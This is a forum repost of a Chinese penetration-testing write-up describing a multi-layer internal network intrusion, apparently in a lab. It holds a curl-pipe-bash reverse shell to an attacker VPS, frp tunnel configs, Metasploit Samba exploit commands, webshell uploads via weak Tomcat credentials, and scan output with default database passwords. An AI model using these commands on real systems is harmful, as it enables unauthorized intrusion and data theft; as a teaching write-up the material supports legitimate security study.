安全矩阵

 找回密码
 立即注册
搜索
查看: 662|回复: 0

记一次内网实战

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-12-28 15:26:59 | 显示全部楼层 |阅读模式
原文链接:记一次内网实战


0x00 边界服务器

访问http://1.xx.xx.xx.:xx7/login
编辑
发现rememberMe字段
编辑
工具检测

  1. shiro 反序列化,上传内存马
  2. [++] 存在shiro框架!
  3. [++] 找到key:kPH+bIxk5D2deZiIxcaaaA==
  4. [+] 爆破结束
  5. [-] 测试:CommonsBeanutils1  回显方式: AllEcho
  6. [-] 测试:CommonsBeanutils1  回显方式: TomcatEcho
  7. [++] 发现构造链:CommonsBeanutils1  回显方式: SpringEcho
  8. [++] 请尝试进行功能区利用。
复制代码


编辑
远程连接
编辑
反弹shell到云主机,使用curl反弹shell
  1. <code class="hljs">curl http://82.xx.xx.xx:xx0/bash.html|bash</code>
复制代码


编辑
0x01 一层网络

0x01-01 fscan内网扫描

通过上传fscan,扫描发现存活主机

  1. 10.10.135.1:22 open
  2. 10.10.135.35:139 open
  3. 10.10.135.35:445 open
  4. 10.10.135.190:8080 open
  5. 10.10.135.25:8080 open
  6. 10.10.135.66:3306 open
  7. [+] mysql:10.10.135.66:3306:root 123456
  8. [*] 10.10.135.35  (Windows 6.1)
  9. [*] WebTitle:http://10.10.135.190:8080 code:200 len:52     title:None
  10. [*] WebTitle:http://10.10.135.25:8080  code:302 len:0      title:None 跳转url: http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2
  11. [*] WebTitle:http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2 code:200 len:2608   title:Login Page
  12. [+] InfoScan:http://10.10.135.25:8080/login;jsessionid=ACFC3E30347DD234AF1E730D02A792E2 [Shiro]
  13. [+] http://10.10.135.190:8080 poc-yaml-struts2_046-1
  14. [+] http://10.10.135.190:8080 poc-yaml-struts2_045 poc1
复制代码


编辑
编辑
0x01-02 配置frp设置socks5代理
目标机(1.xx.xx.xx4)frpc
配置远程连接的IP地址(82.xx.xx.xx),通过tcp协议的socks5的7777端口进行通信传输

  1. frpc.ini
  2. ------------------------------------
  3. [common]
  4. server_addr = 82.1xx.xx.xx1
  5. server_port = 7077

  6. [plugin_socks5]
  7. type = tcp  #协议
  8. remote_port = 9566 #指定远程服务器的端口
  9. plugin = socks5
  10. ------------------------------------
  11. 启动客户端
  12. chmod +x frpc
  13. chmod +x frpc.ini
  14. exectue -f ./frpc -c ./frpc.ini
复制代码


vps(82.xx.xx.xx1)配置frps
  1. frps.ini
  2. -----------------------------------
  3. [common]
  4. bind_port = 7077 #必要,frp服务端端口
  5. ------------------------------------
  6. 启动服务端
  7. chmod +x frps
  8. chmod +x frps.ini
  9. ./frps -c ./frps.ini
复制代码


踩坑1:忘记在防火墙添加策略,导致失败
frp通道建立成功
编辑
配置好代理
编辑
0x01-03 访问内网的(10.10.135.66)
  1. <code class="hljs">10.10.135.66:3306:root 123456</code>
复制代码


编辑
0x01-04 访问内网的(10.10.135.35)
  1. <code class="hljs">10.10.135.35  (Windows 6.1)</code>
复制代码


编辑
发现内网存活主机 开展信息搜集,发现该主机系统为linux ,开放139、445端口,其中445端
口为samba 4.6.3 通过search samba 4.6 发现存在漏洞
  1. search samba 4.6
  2. use exploit/linux/samba/is_known_pipename
  3. set rhosts 10.10.135.35
  4. run
复制代码


编辑
编辑
编辑
0x01-05 访问内网的(10.10.135.190)
structs漏洞
http://10.10.135.190:8080 poc-yaml-struts2_046-1
http://10.10.135.190:8080 poc-yaml-struts2_045 poc1
编辑
配置代理,通过proxifer配置socks5代理,把电脑代理到内网,然后使用struts2工具去探测内网漏洞
编辑
执行命令
编辑
编辑
编辑
给网站目录下上传文件jsp文件,下载Godzilla,配置代理,成功连接
编辑
编辑
0x02二层网络
0x02-01 内网扫描

  1. ./fscan_amd64 -h 172.16.15.0/24 -np

  2. 172.16.15.115:3306 open
  3. 172.16.15.111:3306 open
  4. 172.16.15.88:139 open
  5. 172.16.15.145:445 open
  6. 172.16.15.88:445 open
  7. 172.16.15.66:8009 open
  8. 172.16.15.87:8080 open
  9. 172.16.15.66:8080 open
  10. 172.16.15.187:6379 open
  11. 172.16.15.145:139 open
  12. [+] mysql:172.16.15.111:3306:root 123456
  13. [+] Redis:172.16.15.187:6379 unauthorized file:/data/dump.rdb
  14. [+] mysql:172.16.15.115:3306:root 123456
  15. [*] WebTitle:http://172.16.15.66:8080  code:200 len:11230  title:Apache Tomcat/8.0.43
  16. [*] WebTitle:http://172.16.15.87:8080  code:200 len:52     title:None
  17. [*] 172.16.15.145  (Windows 6.1)
  18. [*] 172.16.15.88  (Windows 6.1)
  19. [+] http://172.16.15.87:8080 poc-yaml-struts2_045 poc1
  20. [+] http://172.16.15.66:8080/manager/html poc-yaml-tomcat-manager-weak [{username tomcat} {password tomcat}]
复制代码


编辑
编辑
此时的获取的内网信息
编辑
0x02-02 添加路由
在边界服务器1.xx.xx.xx:xx7/10.10.135.25上添加路由配置,使得 边界服务器与172.16.15.0/24网段连通
编辑
0x02-03 访问内网的(172.16.15.111)
  1. <code class="hljs">mysql:172.16.15.111:3306:root 123456</code>
复制代码


编辑
0x02-04 访问内网的(172.16.15.115)
  1. <code class="hljs">172.16.15.115:3306:root 123456</code>
复制代码


编辑
0x02-05 访问内网的(172.16.15.187)
  1. <code class="hljs">172.16.15.187:6379 unauthorized file:/data/dump.rdb</code>
复制代码


0x02-06 访问内网的(172.16.15.88)
  1. <code class="hljs">172.16.15.88  (Windows 6.1)</code>
复制代码


编辑
0x02-07 访问内网的(172.16.15.145)
  1. <code class="hljs">172.16.15.145  (Windows 6.1)</code>
复制代码


编辑
0x02-08 tomcat任意文件上传(172.16.15.66:8080)
  1. <code class="hljs">http://172.16.15.66:8080/manager/html poc-yaml-tomcat-manager-weak [{username tomcat} {password tomcat}]</code>
复制代码


burp 设置socks5代理
编辑
编辑
下载冰蝎,然后shell,jsp,进行压缩,生成shell.zip,手动更改后缀shell.war,直接进行文件上传
编辑
访问连接
  1. <code>http://172.16.15.66:8080//shell/shell.jsp</code><code>
  2. rebeyond</code>
复制代码


编辑
进行反弹shell
编辑
发现是双网卡
编辑
0x03 三层服务器
0x03-01 内网扫描

编辑
此时的内网信息收集
编辑
0x03-02 添加路由
编辑
0x03-03 访问内网的(192.168.13.55)

  1. [qq]<code class="hljs">mysql:192.168.13.55:3306:root 123456</code>[/qq]
复制代码


编辑
0x03-04 访问内网的(192.168.13.56)

Postgres:192.168.13.56:5432:postgres postgres
编辑
0x03-05 访问内网的(192.168.13.203)
  1. <code class="hljs">http://192.168.13.203/core/install.php</code>
复制代码


查看drupal8.5.0的漏洞
编辑
0x04 总结

0x04-01 网络拓扑

编辑
0x04-01 漏洞知识点

1、shiro反序列化漏洞
2、strut2漏洞
3、Drupal漏洞
4、内网代理工具
5、数据库连接工具
6、window的samba漏洞
7、viper的使用
————————————————
作者:星球守护者
原文链接:https://blog.csdn.net/qq_41901122/article/details/127704163


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 04:32 , Processed in 0.014325 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表